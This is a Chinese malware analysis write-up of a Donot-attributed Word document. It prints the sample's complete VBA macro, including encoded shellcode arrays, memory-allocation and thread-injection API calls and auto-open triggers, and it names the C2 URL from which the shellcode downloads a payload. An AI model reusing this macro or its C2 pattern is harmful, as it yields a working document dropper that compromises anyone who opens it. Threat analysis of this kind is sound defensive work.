作者:Yenn_
原文鏈接: https://0xdf1001f.github.io/2021/02/23/OD%E8%B0%83%E8%AF%95%E5%AE%8F%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E6%96%B0%E7%BA%BF%E7%A8%8B/
donot - fees_10_to_12-copy.doc - 7a6559ff13f2aecd89c64c1704a68588
基本信息
| File Name | File Size | File Type | MD5 |
|---|---|---|---|
| fees_10_to_12-copy.doc | 46,119 Bytes | Downloader | 7a6559ff13f2aecd89c64c1704a68588 |
樣本是一個帶有宏代碼的.doc文檔,文檔內無誘餌內容,代碼部分被加密
樣本分析
donot - fees_10_to_12-copy.doc
將宏代碼提取后:
#If VBA7 Then
Private Declare PtrSafe Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As LongPtr, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As Long, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#End If
Sub iIljILiiJILLlljL()
Dim jLlJLiiLjliLIIiL As Variant, ILlIjjlLJJJJlJIJ As Variant, IiJlLIlJIjIJJIiI As Variant, JlLiLJjLjiJlllIi As Long
#If VBA7 Then
Dim iIJIllLIliILJIll As LongPtr, jJjjJILLLJjijjjj As LongPtr, lljIJiiiIIjJjiIj As LongPtr
#Else
Dim iIJIllLIliILJIll As Long, jJjjJILLLJjijjjj As Long, lljIJiiiIIjJjiIj As Long
#End If
jLlJLiiLjliLIIiL = Array(137, 255, 85, 137, 229, 85, 131, 236, 64, 217, 235, 155, 217, 116, 36, 244, 93, 131, 237, 9, 141, 77, 37, 186, 188, 3, 0, 0, 246, 17, 128, 49, 253, 65, 74, 117, 247, 51, 203, 186, 50, 2, 2, 2, 102, 137, 54, 3, 137, 116, 14, 137, 116, 30, 137, 92, 10, 137, 124, 34, 137, 52, 130, 125, 12, 48, 119, 240, 139, 220, 235, 133, 2, 2, 2, 98, 139, 255, 139, 241, 84, 137, 113, 62, 137, 118, 28, 122, 3, 220, 84, 137, 116, 34, 3, 220, 51, 203, 75, 131, 119, 2, 209, 194, 175, 184, 67, 175, 3, 218, 84, 51, 244, 13, 188, 18, 58, 212, 118, 10, 195, 204, 5, 3, 212, 66, 233, 243, 59, 119, 2, 92, 119, 230, 88, 139, 221, 137, 88, 38, 3, 249, 100, 137, 14, 73, 137, 88, 30, 3, 249, 137, 6, 137, 3, 250, 139, 71, 2, 92, 129, 199, 6, 129, 127, 2, 2, 119, 167, 99, 193, 130, 58, 234, 118, 13, 130, 58, 235, 118, 8, 130, 58, 206, 118, 7, 130, 58, 233, 119, 19, 131, 122, 7, 146, 146, 146, 146, 118, 10, 139, _
253, 87, 139, 231, 143, 66, 7, 253, 226, 104, 2, 104, 2, 139, 229, 197, 5, 182, 155, 113, 166, 234, 106, 253, 253, 253, 104, 66, 106, 2, 50, 2, 2, 106, 2, 2, 82, 2, 104, 2, 253, 21, 129, 198, 10, 139, 197, 197, 69, 6, 227, 182, 62, 180, 197, 69, 10, 146, 124, 3, 99, 197, 69, 38, 53, 233, 59, 125, 197, 69, 34, 60, 109, 80, 12, 197, 69, 42, 61, 95, 240, 28, 197, 69, 26, 129, 23, 52, 115, 197, 69, 14, 66, 240, 75, 44, 197, 69, 18, 232, 32, 210, 59, 197, 69, 22, 21, 79, 176, 204, 197, 69, 30, 134, 164, 162, 71, 197, 69, 46, 128, 237, 13, 185, 197, 69, 50, 94, 48, 183, 217, 197, 69, 54, 74, 69, 36, 93, 197, 69, 58, 131, 60, 8, 98, 197, 69, 62, 127, 219, 196, 49, 197, 69, 66, 104, 181, 10, 187, 197, 69, 70, 99, 244, 160, 171, 197, 69, 74, 220, 177, 180, 69, 197, 5, 182, 155, 113, 166, 197, 69, 78, 158, 120, 242, 113, 197, 69, 82, 35, 243, 227, 141, 197, 69, 86, 168, 77, 99, 216, _
234, 183, 252, 253, 253, 234, 43, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 73, 103, 112, 108, 103, 110, 49, 48, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 106, 109, 108, 2, 2, 106, 119, 112, 110, 111, 143, 6, 38, 82, 253, 85, 6, 129, 198, 10, 139, 196, 197, 69, 98, 81, 20, 0, 34, 197, 69, 102, 161, 125, 107, 231, 85, 143, 125, 98, 234, 85, 252, 253, 253, 93, 234, 37, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 87, 112, 110, 111, 109, 108, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 51, 194, 143, 143, 99, 1, 2, 2, 143, 93, 110, 82, 82, 104, 125, 81, 83, 82, 253, 85, 102, 129, 250, 2, 13, 135, 246, 2, 2, 2, 234, 45, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 81, 103, 97, 109, 108, _
102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 2, 253, 85, 82, 51, 194, 82, 104, 3, 104, 1, 82, 104, 3, 106, 2, 2, 2, 130, 81, 253, 85, 14, 82, 143, 157, 238, 2, 2, 2, 104, 2, 143, 22, 38, 104, 2, 80, 106, 2, 82, 2, 2, 81, 82, 253, 85, 70, 129, 198, 6, 90, 82, 253, 85, 30, 139, 220, 244, 20, 130, 52, 60, 68, 131, 60, 90, 137, 135, 59, 119, 240, 130, 57, 146, 118, 66, 130, 57, 206, 118, 57, 130, 57, 139, 118, 52, 234, 46, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 233, 54, 234, 40, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, _
81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 253, 225, 234, 31, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 71, 122, 107, 118, 107, 108, 101, 34, 86, 106, 112, 103, 99, 102, 44, 2, 253, 85, 82, 129, 198, 62, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 107, 97, 109, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)
ILlIjjlLJJJJlJIJ = Array(144, 85, 72, 137, 229, 85, 72, 129, 236, 128, 0, 0, 0, 232, 0, 0, 0, 0, 93, 72, 131, 237, 18, 72, 141, 77, 47, 72, 199, 194, 76, 4, 0, 0, 246, 17, 128, 49, 253, 72, 255, 193, 72, 255, 202, 117, 243, 103, 78, 137, 6, 39, 98, 2, 2, 2, 79, 137, 66, 26, 79, 143, 98, 18, 79, 137, 6, 38, 254, 75, 137, 122, 98, 136, 69, 12, 62, 48, 118, 10, 79, 137, 2, 79, 59, 226, 119, 239, 75, 137, 114, 50, 233, 125, 83, 80, 81, 87, 84, 85, 74, 139, 255, 74, 139, 241, 84, 137, 113, 62, 137, 182, 28, 138, 2, 2, 2, 74, 3, 220, 84, 137, 116, 34, 74, 3, 220, 74, 51, 203, 74, 253, 203, 131, 119, 2, 209, 194, 175, 184, 253, 195, 175, 74, 3, 218, 84, 74, 51, 244, 13, 188, 18, 58, 212, 118, 8, 195, 204, 5, 3, 212, 74, 253, 194, 233, 237, 59, 119, 2, 92, 119, 221, 88, 74, 139, 221, 137, 88, 38, 74, 3, 249, 100, 137, 14, 73, 137, 88, 30, 74, 3, 249, 137, 6, 137, 74, 3, 250, 74, 139, _
71, 2, 92, 74, 129, 199, 10, 129, 127, 2, 2, 119, 147, 93, 92, 95, 89, 88, 91, 193, 104, 2, 104, 2, 74, 139, 229, 197, 5, 182, 155, 113, 166, 234, 109, 253, 253, 253, 74, 129, 238, 34, 74, 197, 195, 2, 2, 2, 2, 74, 197, 192, 2, 2, 82, 2, 75, 197, 194, 2, 50, 2, 2, 75, 197, 195, 66, 2, 2, 2, 253, 21, 74, 129, 198, 34, 74, 129, 198, 18, 74, 139, 197, 197, 5, 182, 155, 113, 166, 197, 69, 10, 227, 182, 62, 180, 197, 69, 18, 207, 102, 203, 87, 197, 69, 26, 66, 240, 75, 44, 197, 69, 34, 134, 164, 162, 71, 197, 69, 42, 94, 48, 183, 217, 197, 69, 50, 99, 244, 160, 171, 197, 69, 58, 35, 243, 227, 141, 234, 4, 253, 253, 253, 74, 137, 13, 74, 137, 93, 10, 74, 59, 219, 126, 7, 74, 43, 219, 233, 4, 74, 43, 219, 74, 245, 211, 74, 131, 251, 2, 50, 5, 2, 126, 110, 74, 51, 194, 74, 253, 194, 100, 131, 62, 1, 2, 193, 119, 247, 74, 129, 194, 6, 74, 137, 30, 1, 100, 129, 225, _
2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 66, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 197, 1, 2, 2, 2, 2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 34, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 74, 186, 119, 112, 110, 111, 109, 108, 2, 2, 82, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 195, 253, 85, 10, 74, 129, 198, 34, 74, 129, 198, 10, 74, 139, 196, 197, 69, 74, 81, 20, 0, 34, 197, 69, 82, 161, 125, 107, 231, 85, 74, 143, 125, 74, 234, 60, 252, 253, 253, 93, 66, 130, 230, 242, 74, 143, 135, 249, 1, 2, 2, 74, 143, 93, 98, 74, 129, 238, 50, 74, 197, 195, 2, 2, 2, 2, 74, 139, 192, 75, 139, 218, 75, 197, 195, 125, 2, 2, 2, 74, 197, 70, 38, 34, 2, 2, 2, 2, 74, 197, 70, 38, 42, 2, 2, 2, _
2, 253, 85, 82, 74, 129, 198, 50, 74, 129, 250, 2, 13, 135, 132, 3, 2, 2, 74, 129, 238, 66, 74, 139, 219, 74, 184, 2, 2, 2, 130, 2, 2, 2, 2, 75, 197, 194, 3, 2, 2, 2, 75, 197, 195, 2, 2, 2, 2, 74, 197, 70, 38, 34, 1, 2, 2, 2, 74, 197, 70, 38, 42, 3, 2, 2, 2, 74, 197, 70, 38, 50, 2, 2, 2, 2, 253, 85, 26, 74, 129, 198, 66, 82, 74, 143, 157, 226, 2, 2, 2, 104, 2, 78, 143, 22, 38, 74, 129, 238, 50, 74, 139, 195, 74, 139, 216, 75, 197, 194, 2, 82, 2, 2, 79, 139, 211, 74, 197, 70, 38, 34, 2, 2, 2, 2, 253, 85, 50, 74, 129, 198, 50, 74, 129, 198, 10, 90, 74, 129, 238, 34, 74, 139, 195, 253, 85, 34, 74, 129, 198, 34, 66, 130, 230, 242, 74, 129, 238, 34, 233, 54, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, _
103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 44, 2, 74, 143, 15, 199, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 74, 139, 220, 244, 20, 130, 52, 60, 74, 253, 196, 131, 60, 90, 137, 135, 59, 119, 242, 130, 57, 146, 118, 86, 130, 57, 206, 118, 77, 130, 57, 74, 118, 72, 66, 130, 230, 242, 74, 129, 238, 34, 233, 50, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 203, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 233, 74, 66, 130, 230, 242, 74, 129, 238, 34, 233, 44, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 201, 253, 253, 253, 253, _
85, 58, 74, 129, 198, 34, 253, 225, 74, 131, 198, 138, 2, 2, 2, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 114, 108, 101, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)
#If Win64 Then
IiJlLIlJIjIJJIiI = ILlIjjlLJJJJlJIJ
#Else
IiJlLIlJIjIJJIiI = jLlJLiiLjliLIIiL
#End If
iIJIllLIliILJIll = liljJjliiJIiiilL(0, UBound(IiJlLIlJIjIJJIiI), &H1000, &H40)
For JlLiLJjLjiJlllIi = LBound(IiJlLIlJIjIJJIiI) To UBound(IiJlLIlJIjIJJIiI)
jJjjJILLLJjijjjj = IiJlLIlJIjIJJIiI(JlLiLJjLjiJlllIi)
lljIJiiiIIjJjiIj = JlljIIIiILjliJJj(iIJIllLIliILJIll + JlLiLJjLjiJlllIi, jJjjJILLLJjijjjj, 1)
Next JlLiLJjLjiJlllIi
lljIJiiiIIjJjiIj = JiJJJJLjIiLiliLl(-1, 0, 0, iIJIllLIliILJIll, 0, 0, 0);創建新線程
End Sub
Sub AutooPEN()
iIljILiiJILLlljL
End Sub
Sub WOrkBook_OPen()
iIljILiiJILLlljL
End Sub通過閱讀宏代碼,得知樣本的大意為硬編碼的數據,解密出一段Shellcode并在自身中創建新線程執行。
在創建線程的地方下斷,“iIJIllLIliILJIll”為新線程函數地址,通過調試得到這次的內存地址為”322371584”,轉為HEX為”1337 0000”
通過閱讀宏代碼,得知樣本的大意為硬編碼的數據,解密出一段Shellcode并在自身中創建新線程執行。
在創建線程的地方下斷,“iIJIllLIliILJIll”為新線程函數地址,通過調試得到這次的內存地址為”322371584”,轉為HEX為”1337 0000”。
這里創建新線程后,代碼進入了新線程內,Office內的調試器不能調試,OD忽略所有異常然后附加進程”WINWORD.exe”,跳轉前面的函數地址,來到寫入的Shellcode地址,修改EIP到代碼起始位置,開始調試。
New Thread
解密算法:
解密獲取到VirtualAlloc的地址并調用,申請一塊內存,通過硬編碼寫入數據,再次解密出需要使用的函數地址。
嘗試從C2地址下載文件”http://cachepage.icu/queen/PLK5uovTqDpkBkGHn364mqgVAF950dhN.ico"
截至分析時,下載的文件已失效
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/1508/
暫無評論